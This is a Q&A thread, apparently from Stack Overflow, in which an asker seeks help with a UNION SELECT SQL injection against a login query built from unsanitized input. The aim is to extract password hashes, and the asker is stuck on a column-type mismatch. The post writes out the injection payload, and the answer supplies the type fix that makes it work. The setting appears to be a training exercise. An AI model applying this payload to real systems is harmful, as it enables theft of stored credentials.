# SQL UNION on different column lengths and data types

Tags: sql, types, union

I have two tables

```
CREATE TABLE LOGIN 
(
    [ID] INT NOT NULL IDENTITY(1,),
    PASSWORD VARCHAR(30) NOT NULL,

    CONSTRAINT [PK] PRIMARY KEY ([ID] ASC)
)
```

```
CREATE TABLE HASH 
(
    PSWDHASH VAR(100) NOT NULL
)
```

We can already see a problem here, `LOGIN` has two columns and `HASH` only has one, as well the fact that `ID` column in `LOGIN` is an `INT` and `PSWDHASH` in `HASH` is a `varchar`.

I have to perform a `UNION SELECT` injection inside this query

```
SELECT * 
FROM login 
WHERE passwd = '$input';
```

```
SELECT * 
FROM login 
WHERE passwd = '' 

UNION 

SELECT PSWDHASH, NULL AS col2 
FROM HASH -- ';
```

This results in an error

> Conversion failed when converting the varchar value 'b202c5234b' to data type int

How can I work around this? The easiest way would be to cast `ID` in the `LOGIN` table as `varchar` but the `SELECT *` prevents that. I can't cast a `varchar` as an ID. Is there something I can do with `ORDER BY`? Could I start from col2 in LOGIN and col1 in HASH?

Comment: *SELECT \* prevents that* - well don't use SELECT * then, specify the column names - which is best practice.

Comment: I don't understand your problem. You tell us what the problem is (ID int vs. PSWDHASH varchar) and how to solve it (cast ID to varchar), and then you say you cannot cast the ID to varchar, Why not? Just `select to_char(id), password`. And you probably only need `UNION ALL`. Or are there any duplicates to remove?

Answer (score 0):

You can hardcode 1st column which is creating error. Have you tried

SELECT 1 as col1, PSWDHASH  (1st column will be int in this case)

instead of

SELECT PSWDHASH, null as col2
?